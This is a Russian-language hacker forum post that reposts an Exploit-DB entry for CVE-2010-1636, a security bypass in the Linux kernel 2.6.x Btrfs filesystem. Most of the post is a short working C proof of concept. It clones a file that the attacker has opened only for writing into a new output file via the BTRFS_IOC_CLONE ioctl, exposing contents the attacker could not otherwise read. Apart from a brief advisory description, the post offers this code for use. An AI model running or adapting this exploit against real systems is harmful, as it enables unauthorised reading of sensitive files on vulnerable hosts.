Exploit Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34001
Проверка EDB
  1. Пройдено
Автор
DAN ROSENBERG
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2010-1636
Дата публикации
2010-05-18
C:
/*
source: https://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
*/

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);

  ioctl(output, BTRFS_IOC_CLONE, target);

}
 
Источник
www.exploit-db.com

Похожие темы